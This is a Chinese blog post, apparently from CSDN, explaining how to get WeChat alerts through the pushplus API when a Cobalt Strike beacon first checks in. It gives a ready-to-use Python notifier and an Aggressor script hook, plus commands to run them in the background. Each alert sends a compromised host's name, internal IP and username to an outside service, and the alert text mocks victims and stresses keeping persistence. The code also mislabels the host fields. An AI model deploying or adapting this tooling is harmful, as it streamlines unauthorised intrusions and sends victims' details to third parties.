CobaltStrike上线微信通知

最新推荐文章于 2024-07-05 12:10:58 发布
最新推荐文章于 2024-07-05 12:10:58 发布
阅读量504 收藏
点赞数
分类专栏: 从入门到入狱 文章标签: 微信 web安全 安全 服务器 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/129047855
版权

CobaltStrike上线微信通知

利用pushplus公众号(每天免费发送200条消息)

http://www.pushplus.plus/push1.html

扫码登录后需要复制token

在这里插入图片描述

可以测试一下发送一下消息,手机会受到如下消息。可以在微信提示里将消息免打扰关闭(默认是开启的)

在这里插入图片描述

利用该api接口在上线后进行请求,参考了github上大佬的代码。但接口变了用不了只能自己改一下,改好的代码如下

# encoding:utf-8
import argparse
import requests
import random
import string
import json


token = 'xxxxxx' #在 http://www.pushplus.plus/push1.html 复制

parser = argparse.ArgumentParser(description='Beacon Info')
parser.add_argument('--computername')
parser.add_argument('--internalip')
parser.add_argument('--username')
args = parser.parse_args()

internalip = args.internalip
computername = args.computername
username = args.username
ran_str = ''.join(random.sample(string.ascii_letters + string.digits, 8))

title = "TPAER专用CS主机上线提醒"
content = """

**主人又有笨蛋上线了~**

**主机名: {}**

**IP: {}**

**用户名: {}**

**Token: {}**

**注意权限维持**
""".format(internalip, computername, username, ran_str)

url = 'http://www.pushplus.plus/api/send'
data = {
    "token":token,
    "title":title,
    "content":content,
    "template":"markdown",
    "channel":"wechat"
}
body=json.dumps(data).encode(encoding='utf-8')
headers = {'Content-Type':'application/json'}
requests.post(url,data=body,headers=headers)

可以将token替换,直接运行看微信是否成功收到消息,测试成功后放在服务器某目录下

然后是一个.cna文件,里面需要修改的cmd命令中的地址

on beacon_initial {
	println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1,"pid"));
	local('$internalIP $computerName $userName');
	$internalIP = replace(beacon_info($1,"internal")," ","_");
	$computerName = replace(beacon_info($1,"computer")," ","_");
	$userName = replace(beacon_info($1,"user")," ","_");
	$cmd = 'python3 /root/ATK/CSonWeChat/PushPlus.py' . " --computernam " . $computerName . " --internalip " . $internalIP . " --username " . $userName;
	println("Sending server: " . $cmd);
	exec($cmd);
}

在准备完成后进入cs的目录下,可以使用screen也可以nohup命令后台挂载

我这里直接使用screen,然后执行如下命令

./agscript Cobalt_Strikeip 端口 用户 密码 /目录/PushPlus.cna > /目录/PushPlus.log 2>&1 &

查看进程,成功跑起

ps -aux | grep agscript

在这里插入图片描述

在CS有主机上线后,微信成功收到了发来的提示信息
在这里插入图片描述
在这里插入图片描述

tpaer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CobaltStrike线微信提醒
谢公子的博客
06-23 2320
在红蓝对抗中,我们经常会遇到机器上线了,但是没有及时的发现,导致机器在发现之前掉线的情况。
易语言微信通知接口.
08-08
易语言微信通知接口是一种在易语言编程环境下,用于实现企业微信发送通知的功能。这个接口使得开发者无需注册额外的服务,也无需搭建服务器,就能直接在程序中集成向企业微信发送消息的能力,大大简化了开发流程。...
Cobalt Strike上线微信机器人提醒
混子
12-28 7868
之前看到师傅们cs上线提醒用的是钉钉机器人,但是钉钉不一定每个人手机上都有,微信应该是每个人手机上都有的,就想着整个微信的,这不就巧了,在刷动态时,发现了微信聊天机器人,改造一下这不就刚正合适,这就跟nice,于是乎就去学了手微信机器人,最后也是成功接受到微信给我发目标信息,一个字爽。这篇文章主要是通过微信机器人来实现目标上线提醒
插件推荐-cs上线提醒
mashiro_hibiki的博客
06-03 257
在打项目的时候可能在吃着饭,回去的时候看到上线的beacon已经断开连接半小时了,这时就知道自己的炮灰🐎已经被干掉,之前铺垫的内容早已白费,只能留下不争气的泪水。这款插件就是为了在上线后的第一时间通知到个人,方便打工人可以很快的放下手中的碗筷赶紧回到电脑前继续打着项目。(拳头硬了)cs上线提醒的插件有很多种网上相关的文章也是多的数不胜数,但是笔者再重新整理环境的时候发现这个插件还是非常实用的,于是又重新拿出来写了这篇文章,笔者这里就推荐经常用的那一款,下面是项目连接。
Cobalt Strike设置客户端上线微信推送通知(Server酱)
imtech的博客
10-08 1558
CS被控端上线微信提醒。
PushPlus推送CobaltStike上线提醒
The current road is different, love needs to distinguish between right and wrong
11-20 3726
CobaltStike上线提醒
CS云函数及上线提醒
热门推荐
LiBai'S BLOG
11-12 1万+
CS云函数及上线提醒
Cobalt Strike的多种上线提醒方法
crowsec
12-28 1838
在攻防的时候,尤其在钓鱼时,常常需要对Cobalt Strike设置上线提醒,本文将从单用户提醒到多用户提醒,微信提醒到邮件提醒等进行描述。
jenkins微信构建通知
01-17
jenkins构建完成后,想企业微信进行发送消息通知构建信息
微信支付开发发货通知实例
12-18
为了更好地跟踪订单的情况,需要第三方在收到最终支付通知之后,调用发货通知API告知微信后台该订单的发货状态。 发货时间限制:虚拟、服务类24小时内,实物类72小时内。 请在收到支付通知后,按时发货,并使用发货...
ftp备份企业微信通知
04-09
可以用ftp备份上传,同时可以微信通知,上传时有完整上传,也可以压缩上传,基于.net4、rar5.0,需要加入企业微信,才可以进行通知。保证不收集个人信息和其他隐私信息。请扫描压缩包内二维码加入企业微信
365CS:CobaltStrike相关内容
03-17
部分脚本在CobaltStrike4.0以下无法运行,本项目只考虑考虑兼容CobaltStrike4.0。但是重新学习的态度,对于某些优秀的脚本无法兼容4.0也进行收集整理。CobaltStrike思想是红队的未来。 原修订本DMCA政策被删除。现...
呕心沥血的java复杂项目(包括自定义应用层协议、CS多线程、多客户端登录、上下线提醒等等)
haoshen's blog
05-09 4502
呕心沥血的java复杂聊天室(包括自定义应用层协议、CS多线程、多客户端登录、上下线提醒等等) 建议大家先下源代码,导入到Eclipse,然后运行服务器和多个客户端,这样有个不错的体会。下载地址:http://download.csdn.net/detail/woshiwanghao_hi/7320927。
cs提示信息
zhaohongx的专栏
09-19 552
Page.ClientScript.RegisterClientScriptBlock(this.GetType(), "", "alert('邮箱格式不正确!');", true);             return;
Cobalt Strike 设置上线使用微信推送(Server酱)
BROTHERYY的博客
09-16 1185
先看看设置好后的效果~ http://sc.ftqq.com/3.version 使用github账号登录,将生成的SCKEY码保存好,并开通微信推送。 复制下面代码保存为 http_ftqq.cna 文件。 修改url变量里的参数。 # 循环获取所有beacon on beacon_initial { sub http_get { local('$output'); $url = [new java.net.URL: $1]; $strea
基于Java的微信记账小程序【附源码】
小宝的博客
06-29 1129
记账微信小程序的设计主要是对系统所要实现的功能进行详细考虑,确定所要实现的功能后进行界面的设计,在这中间还要考虑如何可以更好的将功能及页面进行很好的结合,方便用户可以很容易明了的找到自己所需要的信息,还有系统平台后期的可操作性,通过对信息内容的详细了解进行技术的开发。对于技术的选择,具体要根据项目的实际情况(例如,开发环境、开发人员的素质、系统的性能要求等)进行决策,但通常的建议是尽可能采用成熟的技术,慎重引入先进技术。IT业界流行的诙谐语“领先一步是先进,领先两步是先烈”讲的就是对技术的选择原则。
自学黑客技术(网络安全)
dexi1113的博客
06-24 2943
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
【网络安全】第3讲 消息认证技术(笔记)
最新发布
Elena's Blog
07-05 719
是报文鉴别码的一个变种。这个散列函数,又称哈希(Hash)函数,也称为指纹函数、杂凑函数、压缩函数... ...报文鉴别码需要使用对称密钥;散列函数不需要使用密钥。报文鉴别码是对全部数据进行加密,因此计算速度慢;散列函数是一种直接产生鉴别码的方法,因此计算速度快。报文鉴别码抵抗攻击的方法是,增加攻击者破解密钥的难度;散列函数抵抗攻击的方法是,增加攻击者找到碰撞的难度。用于保护通信双方免受第三方攻击无法防止通信双方的相互攻击报文宿方伪造报文报文源方否认已发送的报文。
python微信通知
01-12
Python微信通知是通过调用第三方接口实现的一种方式,可以实现向指定的微信用户发送消息的功能。通常使用的第三方接口有Server酱、PushBear等。 使用Python发送微信通知的步骤如下: 1. 注册一个微信公众号,获取appid和appsecret。 2. 在Python中使用requests库,向第三方接口发送请求。 3. 在请求中包含必要的参数,如接收消息的微信用户openid、消息标题和内容等。 4. 根据接口返回结果,判断发送是否成功。 下面以使用Server酱为例,来展示具体的实现步骤: 1. 首先,需要在https://sc.ftqq.com/3.version注册并获取SCKEY。 2. 在Python中引入requests库,并调用`requests.post()`方法发送POST请求。 3. 在请求中包含以下参数: - url: Server酱提供的接口地址,格式为`https://sc.ftqq.com/{SCKEY}.send`。 - data: 包含要发送的消息内容的字典,如`{'text': '消息标题', 'desp': '消息内容'}`。其中,'text'为消息标题,'desp'为消息内容。可以根据需要自行修改。 4. 根据请求返回的结果进行判断,如果返回的状态码为200,则表示发送成功。 下面是一个示例代码: ```python import requests def send_wechat_notification(title, content): url = 'https://sc.ftqq.com/{YOUR_SCKEY}.send' # 替换为自己的SCKEY data = { 'text': title, 'desp': content } response = requests.post(url, data=data) if response.status_code == 200: print('消息发送成功') else: print('消息发送失败') title = 'Python微信通知示例' content = '这是一条通过Python发送的微信通知。' send_wechat_notification(title, content) ``` 以上就是使用Python实现微信通知的简要步骤和示例代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值